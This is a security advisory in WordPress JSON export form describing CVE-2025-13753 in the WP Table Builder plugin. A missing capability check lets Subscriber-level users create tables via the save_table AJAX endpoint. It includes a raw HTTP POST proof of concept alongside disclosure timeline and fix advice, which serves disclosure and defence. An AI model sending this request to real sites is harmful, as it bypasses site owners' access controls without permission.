{"id":3522,"date":"2026-03-12T05:39:37","date_gmt":"2026-03-12T05:39:37","guid":{"rendered":"https:\/\/research.cleantalk.org\/?p=3522"},"modified":"2026-03-12T05:39:37","modified_gmt":"2026-03-12T05:39:37","slug":"cve-2025-13753","status":"publish","type":"post","link":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","title":{"rendered":"CVE-2025-13753\u00a0– WP Table Builder – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation – POC"},"content":{"rendered":"\n

CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. In practical terms this means\u00a0a Subscriber can perform a privileged content creation action<\/strong>\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.<\/p>\n\n\n\n

CVE<\/td>CVE-2025-13753<\/strong><\/td><\/tr>
Plugin Version<\/td>WP Table Builder <= 2.0.19<\/a><\/td><\/tr>
All Time<\/td>2 071 567<\/strong><\/td><\/tr>
Active installations<\/td>50 000+<\/strong><\/td><\/tr>
Publicly Published<\/td>January 8, 2026<\/td><\/tr>
Last Updated<\/td>January 8, 2026<\/td><\/tr>
Researcher<\/td>Dmitrii Ignatyev<\/td><\/tr>
PoC<\/td>Yes<\/td><\/tr>
Exploit<\/td>No<\/td><\/tr>
Reference <\/td>https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2025-13753<\/a>
https:\/\/www.wordfence.com\/threat-intel\/vulnerabilities\/wordpress-plugins\/wp-table-builder\/wp-table-builder-2019-incorrect-authorization-to-authenticated-subscriber-arbitrary-table-creation<\/a>
https:\/\/t.me\/cleantalk_researches\/384<\/a><\/td><\/tr>
Plugin Security Certification by CleanTalk<\/td> \"\"
<\/a><\/td><\/tr>
Logo of the plugin<\/td>\"\"<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\n
\n
\n

Join the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.<\/p>\n<\/div>\n\n\n\n

\n
\n
Get Plugin Security Certificate<\/a><\/div>\n<\/div>\n<\/div>\n<\/div>\nPSC by Cleantalk<\/cite><\/blockquote>\n\n\n\n

Timeline<\/strong><\/h2>\n\n\n\n
November 18, 2025<\/td>Plugin testing and vulnerability detection in the WP Table Builder<\/strong> have been completed<\/td><\/tr>
November 18, 2025<\/td>I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing<\/td><\/tr>
January 8, 2026<\/td>Registered CVE-2025-13753<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n

Discovery of the Vulnerability<\/strong><\/h2>\n\n\n\n

The vulnerable surface is the AJAX endpoint\u00a0save_table<\/code>\u00a0exposed through\u00a0admin-ajax.php?action=save_table<\/code>. The plugin intends to restrict table creation to roles listed under its Allowed Roles configuration and internally models that policy through a dedicated meta capability gate. However, the\u00a0save_table<\/code>\u00a0implementation accepts a request that includes\u00a0security_code<\/code>\u00a0and treats that value as sufficient authorization, verifying only that the request carries the correct import security nonce and then proceeding to create the table. The missing piece is a server side capability enforcement step like\u00a0current_user_can<\/code>\u00a0against the plugin\u2019s allowed roles meta capability. This creates a classic bypass where the security code becomes a bearer token, even though it was never meant to be an access control boundary, and the policy defined by the plugin UI is silently ignored for this specific mutation path.<\/p>\n\n\n\n

Understanding of Incorrect Authorization attack’s<\/strong><\/h2>\n\n\n\n

In WordPress, nonces and localized security codes are request integrity controls, not access control decisions. They help prevent CSRF and blind submissions by tying a request to a session and screen context, but they do not determine whether a user is allowed to perform an action on the server. Real world failures happen when plugin developers treat a nonce as if it were a capability check. This is especially risky in builder style plugins because editor pages often localize configuration objects into JavaScript, and those objects can be read by any role that can load the page, or sometimes by any visitor if the object is printed on public pages. Once a low privilege role can retrieve\u00a0WPTB_CFG.SECURITY_CODE<\/code>, they can call the endpoint directly without any UI. The immediate harm may look like simple clutter, but the deeper problem is that it enables\u00a0unauthorized content injection into a trusted plugin content type<\/strong>, which often becomes a stepping stone to more serious outcomes if any downstream rendering path mishandles stored content.<\/p>\n\n\n\n

Exploiting the Incorrect Authorization<\/strong> <\/strong><\/strong>Vulnerability<\/strong><\/h2>\n\n\n\n

To exploit CVE-2025-13753<\/strong>, an attacker with subscriber+ any cookies:<\/p>\n\n\n\n

\n

POC<\/strong>:<\/p>\n\n\n\n

POST \/wordpress\/wp-admin\/admin-ajax.php?action=save_table HTTP\/1.1\nHost: 127.0.0.1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:140.0) Gecko\/20100101 Firefox\/140.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http:\/\/127.0.0.1\/\nConnection: keep-alive\nCookie: REDACTED\nUpgrade-Insecure-Requests: 1\nSec-Fetch-Dest: document\nSec-Fetch-Mode: navigate\nSec-Fetch-Site: cross-site\nSec-Fetch-User: ?1\nPriority: u=0, i\nContent-Type: application\/json\nContent-Length: 180\n\n{\n  \"security_code\": \"WPTB_CFG.SECURITY_CODE form profile.php\",\n  \"title\": \"PoC\",\n  \"content\": \"{\\\"props\\\":{\\\"cols\\\":1,\\\"rows\\\":1},\\\"rows\\\":[{\\\"cells\\\":[{\\\"props\\\":{\\\"isEmpty\\\":false},\\\"blocks\\\":[]}]}]}\"\n}\n<\/code><\/pre>\n\n\n\n
____<\/p>\n<\/blockquote>\n\n\n\n
The primary impact is integrity and governance loss. Administrators may believe that only selected roles can create and manage tables, but a Subscriber can still create objects behind the scenes, filling the database with unwanted tables and forcing cleanup. On content driven sites, this can become a workflow disruption because tables might appear in editor search or shortcodes lists, confusing staff and increasing the chance that an unreviewed table is embedded into a page. The more serious scenario is chaining. If the table content renderer later outputs stored content with insufficient sanitization, unauthorized table creation becomes an enabler for stored XSS or HTML injection that can fire in admin or front end contexts. Even if WP Table Builder sanitizes well, the bypass still matters because it undermines the plugin\u2019s security model and expands the set of users who can store complex structured data, which is exactly the type of asset attackers prefer for planting payloads and persistence.<\/p>\n\n\n\n
Recommendations for Improved Security<\/strong><\/strong><\/h2>\n\n\n\n
The fix is to enforce authorization on the server for every mutation endpoint, including save_table. The handler should require the plugin\u2019s allowed roles meta capability and call\u00a0current_user_can<\/code>\u00a0before proceeding, and it should treat the security code only as a request authenticity check rather than an authorization decision. If the plugin supports different permission tiers, the capability should be granular and aligned with the Allowed Roles configuration, and the check should occur before any parsing of attacker supplied JSON to reduce attack surface. It is also important to scope the security code so it is never printed for users who are not allowed to manage tables, and to avoid exposing it on public pages entirely. Site owners should review who can access pages that expose\u00a0WPTB_CFG.SECURITY_CODE<\/code>, rotate any relevant nonces by logging users out if needed, and audit the tables list for unexpected objects created by low privilege accounts.<\/p>\n\n\n\n
\n
By taking proactive measures to address IA <\/strong><\/strong><\/strong> like CVE-2025-13753<\/strong> WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.<\/p>\n\n\n\n
#WordPressSecurity #Incorrect Authorization<\/strong><\/strong><\/strong><\/strong> #WebsiteSafety #StayProtected #HighVulnerability<\/p>\n\n\n\n
Use CleanTalk <\/a>solutions to improve the security of your website<\/strong><\/p>\nDmitrii I.<\/cite><\/blockquote>\n","protected":false},"excerpt":{"rendered":"
CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. In practical terms this means\u00a0a Subscriber can perform a privileged content creation action\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.<\/p>\n","protected":false},"author":2,"featured_media":15,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,1],"tags":[],"class_list":["post-3522","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cve","category-security","","tg-column-two"],"yoast_head":"\nCVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/research.cleantalk.org\/cve-2025-13753\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"CVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk\" \/>\n<meta property=\"og:description\" content=\"CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. In practical terms this means\u00a0a Subscriber can perform a privileged content creation action\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/research.cleantalk.org\/cve-2025-13753\/\" \/>\n<meta property=\"og:site_name\" content=\"Plugin Security Certification (PSC) by CleanTalk\" \/>\n<meta property=\"article:published_time\" content=\"2026-03-12T05:39:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"750\" \/>\n\t<meta property=\"og:image:height\" content=\"750\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Dmitrii I\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Dmitrii I\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/\"},\"author\":{\"name\":\"Dmitrii I\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\"},\"headline\":\"CVE-2025-13753\u00a0– WP Table Builder – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation – POC\",\"datePublished\":\"2026-03-12T05:39:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/\"},\"wordCount\":949,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"articleSection\":[\"CVE\",\"Security\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/\",\"name\":\"CVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"datePublished\":\"2026-03-12T05:39:37+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#primaryimage\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"contentUrl\":\"https:\\\/\\\/research.cleantalk.org\\\/wp-content\\\/uploads\\\/2023\\\/10\\\/New_1_not_safe-1.png\",\"width\":750,\"height\":750},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2025-13753\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/research.cleantalk.org\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"CVE-2025-13753\u00a0– WP Table Builder – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation – POC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#website\",\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/\",\"name\":\"Plugin Security Certification (PSC) by CleanTalk\",\"description\":\"Use only certified WordPress plugins for your website\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/research.cleantalk.org\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/research.cleantalk.org\\\/#\\\/schema\\\/person\\\/c33902690394680520b3d4925861bc8b\",\"name\":\"Dmitrii I\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g\",\"caption\":\"Dmitrii I\"},\"sameAs\":[\"https:\\\/\\\/blog.cleantalk.org\"],\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/author\\\/dmitrii-ignatyev\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"CVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","og_locale":"en_US","og_type":"article","og_title":"CVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk","og_description":"CVE-2025-13753 affects WP Table Builder and it is an incorrect authorization vulnerability where a low privilege authenticated user can create new tables even when the site owner configured the plugin to allow table management only for specific roles. The bug is subtle because the plugin does have an authorization model and a dedicated allowed roles gate, yet one AJAX entry point introduces an alternative access path that relies only on possession of a nonce like value and skips the capability check entirely. In practical terms this means\u00a0a Subscriber can perform a privileged content creation action\u00a0as soon as they can see or steal the security code that is exposed in front end or editor context, which breaks the expected role separation that administrators rely on in multi user WordPress installations.","og_url":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","og_site_name":"Plugin Security Certification (PSC) by CleanTalk","article_published_time":"2026-03-12T05:39:37+00:00","og_image":[{"width":750,"height":750,"url":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","type":"image\/png"}],"author":"Dmitrii I","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Dmitrii I","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#article","isPartOf":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/"},"author":{"name":"Dmitrii I","@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b"},"headline":"CVE-2025-13753\u00a0– WP Table Builder – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation – POC","datePublished":"2026-03-12T05:39:37+00:00","mainEntityOfPage":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/"},"wordCount":949,"commentCount":0,"image":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#primaryimage"},"thumbnailUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","articleSection":["CVE","Security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/research.cleantalk.org\/cve-2025-13753\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","url":"https:\/\/research.cleantalk.org\/cve-2025-13753\/","name":"CVE-2025-13753\u00a0- WP Table Builder - Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation - POC - Plugin Security Certification (PSC) by CleanTalk","isPartOf":{"@id":"https:\/\/research.cleantalk.org\/#website"},"primaryImageOfPage":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#primaryimage"},"image":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#primaryimage"},"thumbnailUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","datePublished":"2026-03-12T05:39:37+00:00","author":{"@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b"},"breadcrumb":{"@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/research.cleantalk.org\/cve-2025-13753\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#primaryimage","url":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","contentUrl":"https:\/\/research.cleantalk.org\/wp-content\/uploads\/2023\/10\/New_1_not_safe-1.png","width":750,"height":750},{"@type":"BreadcrumbList","@id":"https:\/\/research.cleantalk.org\/cve-2025-13753\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/research.cleantalk.org\/"},{"@type":"ListItem","position":2,"name":"CVE-2025-13753\u00a0– WP Table Builder – Incorrect Authorization to Authenticated (Subscriber+) Arbitrary Table Creation – POC"}]},{"@type":"WebSite","@id":"https:\/\/research.cleantalk.org\/#website","url":"https:\/\/research.cleantalk.org\/","name":"Plugin Security Certification (PSC) by CleanTalk","description":"Use only certified WordPress plugins for your website","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/research.cleantalk.org\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/research.cleantalk.org\/#\/schema\/person\/c33902690394680520b3d4925861bc8b","name":"Dmitrii I","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/5b981c578a4cae73adc5efd54512580e4b7086353982d1d1e5425a8652b94da6?s=96&d=mm&r=g","caption":"Dmitrii I"},"sameAs":["https:\/\/blog.cleantalk.org"],"url":"https:\/\/research.cleantalk.org\/author\/dmitrii-ignatyev\/"}]}},"_links":{"self":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3522","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/comments?post=3522"}],"version-history":[{"count":1,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3522\/revisions"}],"predecessor-version":[{"id":3524,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/posts\/3522\/revisions\/3524"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/media\/15"}],"wp:attachment":[{"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/media?parent=3522"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/categories?post=3522"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/research.cleantalk.org\/wp-json\/wp\/v2\/tags?post=3522"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}